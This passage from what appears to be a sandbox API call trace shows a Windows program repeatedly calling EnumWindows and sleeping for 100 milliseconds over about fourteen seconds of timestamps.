(lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.903] Sleep (dwMilliseconds=0x64) [0223.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.910] Sleep (dwMilliseconds=0x64) [0223.946] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.947] Sleep (dwMilliseconds=0x64) [0223.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.987] Sleep (dwMilliseconds=0x64) [0224.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.073] Sleep (dwMilliseconds=0x64) [0224.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.117] Sleep (dwMilliseconds=0x64) [0224.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.159] Sleep (dwMilliseconds=0x64) [0224.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.227] Sleep (dwMilliseconds=0x64) [0224.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.262] Sleep (dwMilliseconds=0x64) [0224.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.316] Sleep (dwMilliseconds=0x64) [0224.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.396] Sleep (dwMilliseconds=0x64) [0224.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.469] Sleep (dwMilliseconds=0x64) [0224.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.519] Sleep (dwMilliseconds=0x64) [0224.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.592] Sleep (dwMilliseconds=0x64) [0224.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.664] Sleep (dwMilliseconds=0x64) [0224.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.719] Sleep (dwMilliseconds=0x64) [0224.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.858] Sleep (dwMilliseconds=0x64) [0224.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.933] Sleep (dwMilliseconds=0x64) [0224.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0224.990] Sleep (dwMilliseconds=0x64) [0225.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.070] Sleep (dwMilliseconds=0x64) [0225.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.142] Sleep (dwMilliseconds=0x64) [0225.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.291] Sleep (dwMilliseconds=0x64) [0225.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.445] Sleep (dwMilliseconds=0x64) [0225.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.777] Sleep (dwMilliseconds=0x64) [0225.847] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.848] Sleep (dwMilliseconds=0x64) [0225.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.926] Sleep (dwMilliseconds=0x64) [0225.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0225.998] Sleep (dwMilliseconds=0x64) [0226.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.037] Sleep (dwMilliseconds=0x64) [0226.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.115] Sleep (dwMilliseconds=0x64) [0226.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.187] Sleep (dwMilliseconds=0x64) [0226.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.264] Sleep (dwMilliseconds=0x64) [0226.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.333] Sleep (dwMilliseconds=0x64) [0226.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.628] Sleep (dwMilliseconds=0x64) [0226.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.667] Sleep (dwMilliseconds=0x64) [0226.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.744] Sleep (dwMilliseconds=0x64) [0226.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0226.970] Sleep (dwMilliseconds=0x64) [0227.063] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.064] Sleep (dwMilliseconds=0x64) [0227.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.140] Sleep (dwMilliseconds=0x64) [0227.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.236] Sleep (dwMilliseconds=0x64) [0227.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.294] Sleep (dwMilliseconds=0x64) [0227.374] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.376] Sleep (dwMilliseconds=0x64) [0227.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.493] Sleep (dwMilliseconds=0x64) [0227.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.541] Sleep (dwMilliseconds=0x64) [0227.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.652] Sleep (dwMilliseconds=0x64) [0227.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.727] Sleep (dwMilliseconds=0x64) [0227.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.786] Sleep (dwMilliseconds=0x64) [0227.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.847] Sleep (dwMilliseconds=0x64) [0227.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0227.923] Sleep (dwMilliseconds=0x64) [0228.003] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.004] Sleep (dwMilliseconds=0x64) [0228.084] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.085] Sleep (dwMilliseconds=0x64) [0228.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.175] Sleep (dwMilliseconds=0x64) [0228.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.270] Sleep (dwMilliseconds=0x64) [0228.321] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.322] Sleep (dwMilliseconds=0x64) [0228.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.396] Sleep (dwMilliseconds=0x64) [0228.517] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.518] Sleep (dwMilliseconds=0x64) [0228.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.555] Sleep (dwMilliseconds=0x64) [0228.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.628] Sleep (dwMilliseconds=0x64) [0228.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.720] Sleep (dwMilliseconds=0x64) [0228.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.865] Sleep (dwMilliseconds=0x64) [0228.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.925] Sleep (dwMilliseconds=0x64) [0228.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0228.999] Sleep (dwMilliseconds=0x64) [0229.068] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.068] Sleep (dwMilliseconds=0x64) [0229.108] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.108] Sleep (dwMilliseconds=0x64) [0229.182] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.184] Sleep (dwMilliseconds=0x64) [0229.299] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.300] Sleep (dwMilliseconds=0x64) [0229.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.349] Sleep (dwMilliseconds=0x64) [0229.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.412] Sleep (dwMilliseconds=0x64) [0229.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.529] Sleep (dwMilliseconds=0x64) [0229.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.585] Sleep (dwMilliseconds=0x64) [0229.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.643] Sleep (dwMilliseconds=0x64) [0229.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.720] Sleep (dwMilliseconds=0x64) [0229.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.854] Sleep (dwMilliseconds=0x64) [0229.901] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.901] Sleep (dwMilliseconds=0x64) [0229.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0229.977] Sleep (dwMilliseconds=0x64) [0230.041] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.042] Sleep (dwMilliseconds=0x64) [0230.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.141] Sleep (dwMilliseconds=0x64) [0230.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.300] Sleep (dwMilliseconds=0x64) [0230.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.385] Sleep (dwMilliseconds=0x64) [0230.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.507] Sleep (dwMilliseconds=0x64) [0230.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.598] Sleep (dwMilliseconds=0x64) [0230.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.691] Sleep (dwMilliseconds=0x64) [0230.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.751] Sleep (dwMilliseconds=0x64) [0230.806] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.807] Sleep (dwMilliseconds=0x64) [0230.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.896] Sleep (dwMilliseconds=0x64) [0230.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0230.989] Sleep (dwMilliseconds=0x64) [0231.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.043] Sleep (dwMilliseconds=0x64) [0231.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.196] Sleep (dwMilliseconds=0x64) [0231.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.301] Sleep (dwMilliseconds=0x64) [0231.359] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.360] Sleep (dwMilliseconds=0x64) [0231.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.412] Sleep (dwMilliseconds=0x64) [0231.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.497] Sleep (dwMilliseconds=0x64) [0231.577] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.577] Sleep (dwMilliseconds=0x64) [0231.626] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.626] Sleep (dwMilliseconds=0x64) [0231.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.700] Sleep (dwMilliseconds=0x64) [0231.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0231.930] Sleep (dwMilliseconds=0x64) [0232.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.007] Sleep (dwMilliseconds=0x64) [0232.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.079] Sleep (dwMilliseconds=0x64) [0232.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.143] Sleep (dwMilliseconds=0x64) [0232.190] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.191] Sleep (dwMilliseconds=0x64) [0232.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.290] Sleep (dwMilliseconds=0x64) [0232.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.407] Sleep (dwMilliseconds=0x64) [0232.456] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.457] Sleep (dwMilliseconds=0x64) [0232.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.524] Sleep (dwMilliseconds=0x64) [0232.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.652] Sleep (dwMilliseconds=0x64) [0232.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.718] Sleep (dwMilliseconds=0x64) [0232.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.749] Sleep (dwMilliseconds=0x64) [0232.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.830] Sleep (dwMilliseconds=0x64) [0232.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.907] Sleep (dwMilliseconds=0x64) [0232.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0232.992] Sleep (dwMilliseconds=0x64) [0233.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.064] Sleep (dwMilliseconds=0x64) [0233.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.116] Sleep (dwMilliseconds=0x64) [0233.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.182] Sleep (dwMilliseconds=0x64) [0233.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.276] Sleep (dwMilliseconds=0x64) [0233.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.338] Sleep (dwMilliseconds=0x64) [0233.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.396] Sleep (dwMilliseconds=0x64) [0233.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.481] Sleep (dwMilliseconds=0x64) [0233.607] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.608] Sleep (dwMilliseconds=0x64) [0233.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.728] Sleep (dwMilliseconds=0x64) [0233.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.807] Sleep (dwMilliseconds=0x64) [0233.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.889] Sleep (dwMilliseconds=0x64) [0233.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.945] Sleep (dwMilliseconds=0x64) [0233.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0233.999] Sleep (dwMilliseconds=0x64) [0234.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.071] Sleep (dwMilliseconds=0x64) [0234.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.146] Sleep (dwMilliseconds=0x64) [0234.183] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.187] Sleep (dwMilliseconds=0x64) [0234.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.281] Sleep (dwMilliseconds=0x64) [0234.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.362] Sleep (dwMilliseconds=0x64) [0234.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.423] Sleep (dwMilliseconds=0x64) [0234.486] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.487] Sleep (dwMilliseconds=0x64) [0234.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.570] Sleep (dwMilliseconds=0x64) [0234.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.633] Sleep (dwMilliseconds=0x64) [0234.671] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.672] Sleep (dwMilliseconds=0x64) [0234.754] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.755] Sleep (dwMilliseconds=0x64) [0234.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.864] Sleep (dwMilliseconds=0x64) [0234.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.889] Sleep (dwMilliseconds=0x64) [0234.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.926] Sleep (dwMilliseconds=0x64) [0234.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.963] Sleep (dwMilliseconds=0x64) [0234.964] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0234.965] Sleep (dwMilliseconds=0x64) [0235.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.001] Sleep (dwMilliseconds=0x64) [0235.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.039] Sleep (dwMilliseconds=0x64) [0235.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.053] Sleep (dwMilliseconds=0x64) [0235.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.078] Sleep (dwMilliseconds=0x64) [0235.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.114] Sleep (dwMilliseconds=0x64) [0235.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.151] Sleep (dwMilliseconds=0x64) [0235.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.162] Sleep (dwMilliseconds=0x64) [0235.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.240] Sleep (dwMilliseconds=0x64) [0235.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.282] Sleep (dwMilliseconds=0x64) [0235.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.289] Sleep (dwMilliseconds=0x64) [0235.318] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.319] Sleep (dwMilliseconds=0x64) [0235.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.361] Sleep (dwMilliseconds=0x64) [0235.383] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.384] Sleep (dwMilliseconds=0x64) [0235.399] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.400] Sleep (dwMilliseconds=0x64) [0235.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.436] Sleep (dwMilliseconds=0x64) [0235.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.473] Sleep (dwMilliseconds=0x64) [0235.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.510] Sleep (dwMilliseconds=0x64) [0235.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.551] Sleep (dwMilliseconds=0x64) [0235.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.563] Sleep (dwMilliseconds=0x64) [0235.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.591] Sleep (dwMilliseconds=0x64) [0235.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.629] Sleep (dwMilliseconds=0x64) [0235.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.659] Sleep (dwMilliseconds=0x64) [0235.681] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.682] Sleep (dwMilliseconds=0x64) [0235.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.720] Sleep (dwMilliseconds=0x64) [0235.758] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.758] Sleep (dwMilliseconds=0x64) [0235.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.795] Sleep (dwMilliseconds=0x64) [0235.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.840] Sleep (dwMilliseconds=0x64) [0235.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.856] Sleep (dwMilliseconds=0x64) [0235.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.903] Sleep (dwMilliseconds=0x64) [0235.959] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.961] Sleep (dwMilliseconds=0x64) [0235.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0235.999] Sleep (dwMilliseconds=0x64) [0236.007] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.008] Sleep (dwMilliseconds=0x64) [0236.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.046] Sleep (dwMilliseconds=0x64) [0236.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.095] Sleep (dwMilliseconds=0x64) [0236.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.122] Sleep (dwMilliseconds=0x64) [0236.161] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.162] Sleep (dwMilliseconds=0x64) [0236.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.187] Sleep (dwMilliseconds=0x64) [0236.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.231] Sleep (dwMilliseconds=0x64) [0236.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.276] Sleep (dwMilliseconds=0x64) [0236.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.315] Sleep (dwMilliseconds=0x64) [0236.321] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.321] Sleep (dwMilliseconds=0x64) [0236.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.356] Sleep (dwMilliseconds=0x64) [0236.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.395] Sleep (dwMilliseconds=0x64) [0236.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.418] Sleep (dwMilliseconds=0x64) [0236.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.435] Sleep (dwMilliseconds=0x64) [0236.477] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.478] Sleep (dwMilliseconds=0x64) [0236.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.541] Sleep (dwMilliseconds=0x64) [0236.582] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.583] Sleep (dwMilliseconds=0x64) [0236.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.622] Sleep (dwMilliseconds=0x64) [0236.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.645] Sleep (dwMilliseconds=0x64) [0236.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.663] Sleep (dwMilliseconds=0x64) [0236.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.708] Sleep (dwMilliseconds=0x64) [0236.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.744] Sleep (dwMilliseconds=0x64) [0236.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.749] Sleep (dwMilliseconds=0x64) [0236.786] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.786] Sleep (dwMilliseconds=0x64) [0236.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.833] Sleep (dwMilliseconds=0x64) [0236.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.847] Sleep (dwMilliseconds=0x64) [0236.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.850] Sleep (dwMilliseconds=0x64) [0236.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.876] Sleep (dwMilliseconds=0x64) [0236.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.912] Sleep (dwMilliseconds=0x64) [0236.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.945] Sleep (dwMilliseconds=0x64) [0236.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.953] Sleep (dwMilliseconds=0x64) [0236.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0236.995] Sleep (dwMilliseconds=0x64) [0237.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.035] Sleep (dwMilliseconds=0x64) [0237.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.043] Sleep (dwMilliseconds=0x64) [0237.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.146] Sleep (dwMilliseconds=0x64) [0237.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.185] Sleep (dwMilliseconds=0x64) [0237.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.247] Sleep (dwMilliseconds=0x64) [0237.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.263] Sleep (dwMilliseconds=0x64) [0237.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.299] Sleep (dwMilliseconds=0x64) [0237.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.341] Sleep (dwMilliseconds=0x64) [0237.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.378] Sleep (dwMilliseconds=0x64) [0237.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.414] Sleep (dwMilliseconds=0x64) [0237.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.426] Sleep (dwMilliseconds=0x64) [0237.458] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.459] Sleep (dwMilliseconds=0x64) [0237.499] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.499] Sleep (dwMilliseconds=0x64) [0237.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.524] Sleep (dwMilliseconds=0x64) [0237.528] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.528] Sleep (dwMilliseconds=0x64) [0237.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.543] Sleep (dwMilliseconds=0x64) [0237.581] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.582] Sleep (dwMilliseconds=0x64) [0237.619] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.620] Sleep (dwMilliseconds=0x64) [0237.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.626] Sleep (dwMilliseconds=0x64) [0237.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.657] Sleep (dwMilliseconds=0x64) [0237.698] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.699] Sleep (dwMilliseconds=0x64) [0237.724] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.725] Sleep (dwMilliseconds=0x64) [0237.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.741] Sleep (dwMilliseconds=0x64) [0237.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.778] Sleep (dwMilliseconds=0x64) [0237.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.827] Sleep (dwMilliseconds=0x64) [0237.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.863] Sleep (dwMilliseconds=0x64) [0237.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.904] Sleep (dwMilliseconds=0x64) [0237.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.920] Sleep (dwMilliseconds=0x64) [0237.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.942] Sleep (dwMilliseconds=0x64) [0237.977] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0237.978] Sleep (dwMilliseconds=0x64) [0238.008] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.008] Sleep (dwMilliseconds=0x64) [0238.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.016] Sleep (dwMilliseconds=0x64) [0238.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.053] Sleep (dwMilliseconds=0x64) [0238.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.093] Sleep (dwMilliseconds=0x64) [0238.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.097] Sleep (dwMilliseconds=0x64) [0238.130] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.130] Sleep (dwMilliseconds=0x64) [0238.170] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 